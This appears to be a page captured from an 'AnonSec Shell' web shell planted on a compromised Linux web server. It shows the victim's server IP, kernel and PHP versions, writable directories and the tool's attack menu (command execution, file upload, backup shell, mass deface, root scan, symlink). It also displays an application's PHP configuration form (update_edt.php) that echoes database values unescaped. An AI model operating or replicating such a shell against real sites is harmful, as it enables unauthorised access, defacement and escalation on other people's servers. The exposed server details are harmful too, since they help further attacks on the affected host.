AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ged/modulos/config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/ged/modulos/config/update_edt.php
<?php
    /**
     * Created by PhpStorm.
     * User: RalpAlves
     * Date: 12/04/2016
     * Time: 09:28
     */
    ini_set('display_errors', 'off');
    $data = $conn->query("SELECT * FROM Configuracoes");
    $d    = $data->fetch(PDO::FETCH_OBJ);
?>
<!--<head>-->
<!--    <script src="tinymce/js/tinymce/tinymce.min.js"></script>-->
<!--    <script>-->
<!--        tinymce.init({-->
<!--            selector: 'textarea',  // change this value according to your HTML-->
<!--            max_width: 500,-->
<!--            menubar: false,-->
<!--            selection_toolbar: 'bold italic',-->
<!--            statusbar: false,-->
<!--            encoding: 'utf8'-->
<!--        });-->
<!--    </script>-->
</head>
<div class="container panel panel-primary filterable">
    <div class="container label">
        <a href='index.php'><i aling='center' class='fa fa-arrow-circle-o-left fa-2x' title='Voltar'></i></a>
        <span style="font-size:20px; color: #060606">&nbsp;&nbsp;Versão | Atualizar</span>
    </div>
</div>
<div class="container">
    <form id="form1" name="form1" OnSubmit="showCarga()" id="formulario" method="post" action="?page=config/update_crud&var=editar">
        <div class='panel panel-primary filterable panel-body'>
            <input type='hidden' name='CFG_ID' id='CFG_ID' value="<?php echo $d->CFG_ID ?>"/>
            <div class='col-xs-7 col-sm-7 com-md-7 col-lg-7'>
                <label for='CFG_ULT_VERSAO'>Atual</label>
                <input style="font-size: 23px; color:#295f47;" type='text' class='form-control' name='CFG_ULT_VERSAO' id='CFG_ULT_VERSAO' value="<?php echo $d->CFG_ULT_VERSAO ?>"/>
            </div>
            <div class='col-xs-5 col-sm-5 com-md-5 col-lg-5'>
                <label for='CFG_SERIAL_MAQUINA'>Anterior</label>
                <input style="font-size: 13px;" type='text' class='form-control' name='CFG_SERIAL_MAQUINA' id='CFG_SERIAL_MAQUINA' value="<?php echo $d->CFG_SERIAL_MAQUINA ?>"/>
            </div>
            <div class='col-xs-12 col-sm-12 com-md-12 col-lg-12'>
                <label for='area'>Histórico</label>
                <textarea rows="10" cols="5" name="CFG_HIST_VERSAO" class="form-control"><?php echo $d->CFG_HIST_VERSAO ?></textarea>
            </div>
            <div class='col-xs-12 col-sm-12 com-md-12 col-lg-12'>
                <label for='bt_novo'>&nbsp;</label>
                <br>
                <button type="submit" name="bt_novo" class="btn btn-primary form-control"><i class="glyphicon glyphicon-ok"></i></button>
            </div>
        </div>
    </
    <form>
</div>

Anon7 - 2022
AnonSec Team